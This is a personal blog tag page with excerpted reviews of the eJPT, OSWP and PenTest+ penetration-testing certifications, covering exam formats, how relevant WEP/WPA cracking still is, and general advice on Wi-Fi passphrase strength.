Kirkian Computing

Tag: penetration testing

  • eLearnSecurity Junior Penetration Tester (eJPT)

    In April 2020, I took the eJPT exam from eLearnSecurity. As the “Junior” part of the name suggests, this is an entry level exam, and I think it acts as a good stepping stone towards the eCPPT or the OSCP.

    All of eLearnSecurity’s certifications are good for life, as opposed to Cisco/CompTIA certifications which have to be renewed every 3 years; however, they update the syllabus every so often, so eJPTv2 has now replaced the original eJPT (which I did).

    This was my third penetration testing exam, and it took an interesting approach. PenTest+ is a traditional theory based exam, where you answer multiple choice questions and then a computer instantly gives you the result when you finish. OSWP is a practical exam, where I had to submit a written report and wait for a human to review it. In the eJPT exam, you are given VPN access to a network, and then you have to answer multiple choice questions based on that network. For instance, they might ask you “How many Windows services are configured for automatic startup on SERVER1?” The only way to find out is to gain access to that server, i.e. you have to actually use the skills that you’ve learnt rather than regurgitating trivia points from memory. I think this approach gives the best of both worlds, i.e. a practical test with instant results, although reports are an important skill for real-life penetration tests.

    (more…)

  • Offensive Security Wireless Professional (OSWP)

    In April 2019, I took the Offensive Security Wireless Attacks (WiFu) course and the OSWP exam. (Along with PenTest+ and Microsoft 365 Fundamentials, this was my third exam in a month!)

    In brief, I enjoyed this. I thought the content was interesting, and the exam was actually fun (similar to an escape room). However, the course material was written in 2014 and it could do with an overhaul; Offensive Security updated the OSCP in Feb 2020, so hopefully they will do the same for the OSWP at some point.

    In particular, the course objectives include these:

    • The student will learn to implement attacks against WEP encrypted networks.
    • The student will learn to implement attacks against WPA encrypted networks.
    • The student will learn alternate WEP and WPA cracking techniques.

    So, is this course/certification still relevant? How many people are actually using WEP/WPA rather than WPA2 (or open networks that don’t need cracking)? WiGLE (Wireless Geographic Logging Engine) has some stats on this. Here’s a snapshot from 2020-06-07:

    In particular:

    • 5.26% on WEP
    • 5.01% on WPA

    So, that’s about 10% of wireless networks. Based on that, I can see the skills being useful. However, when I scanned my local (residential) neighbourhood, I couldn’t find any WEP/WPA networks. Any new router from an ISP should come pre-configured with WPA2, and it’s been that way for several years now. I also wonder how up to date those stats are, i.e. whether the WEP networks still exist.

    The good news (as a pen tester) is that the same attacks will work on WPA-PSK and WPA2-PSK. According to WiGLE’s stats, 67.5% of networks use WPA2, although unfortunately they don’t show a breakdown of Personal vs. Enterprise. If you’re using WPA2-Enterprise (802.1X authentication) then you’re safe against these attacks. However, in my anecdotal experience there are a lot of WPA2-PSK networks out there.

    So, that’s a roundabout way of saying that yes, this exam is still relevant.

    If you run a wireless network (at home or at work), how worried should you be? Before I did this course, I’d already heard that WEP is essentially worthless; now that I’ve experienced this from the attacker’s perspective, I can confirm that’s true. WPA2-PSK can be cracked, but it relies on a dictionary attack; if you’ve got a random passphrase then you’re pretty safe, e.g.
    ~*TJ8H|^u@<)Fk05Uq}t;5?N\v(bv<4s-nT`H””yA$(ha.bEP”+jEg)”&y({Fr

    (more…)

  • PenTest+ (PT0-001)

    In April 2019, I took CompTIA’s PenTest+ exam. Along with CySA+, this bridges the gap between Security+ and CASP. As the name suggests, it’s all about penetration testing.

    This is a relatively new exam, and it’s still on the first release (PT0-001). Because of that, it’s not very well known, so I haven’t seen any job adverts asking for it. Personally, I took the Security+ exam in November 2016, so that was due to expire in November 2019 (along with the A+ and Network+). Doing this exam was a good way to renew all of my existing CompTIA certifications, while learning some new skills, so I don’t regret it. However, I mainly see it as a stepping stone towards a more useful certification.

    Pen testing exams generally fall into two categories: theory and practical. Like the other CompTIA exams, PenTest+ is (primarily) multiple choice. This has the advantage that it can be graded automatically by the testing software. However, it also has the downside that it’s less realistic, because it’s more fragmented. It’s entirely possible to pass this exam without ever actually doing a penetration test, which makes the certification less valuable to employers.

    As an analogy, think of a driving test. Normally, you would drive around the area for a while to demonstrate your general ability, then the examiner would ask you to perform a few manoeuvres (e.g. parallel parking). Imagine instead that the examiner drove you to a suitable location, then you swapped seats so that you could do a manoeuvre, then you swapped seats again so that they could drive you to the next location. PenTest+ feels a bit like this, e.g. they might ask you how you would set up a reverse shell but you won’t need to choose when to do that.

    (more…)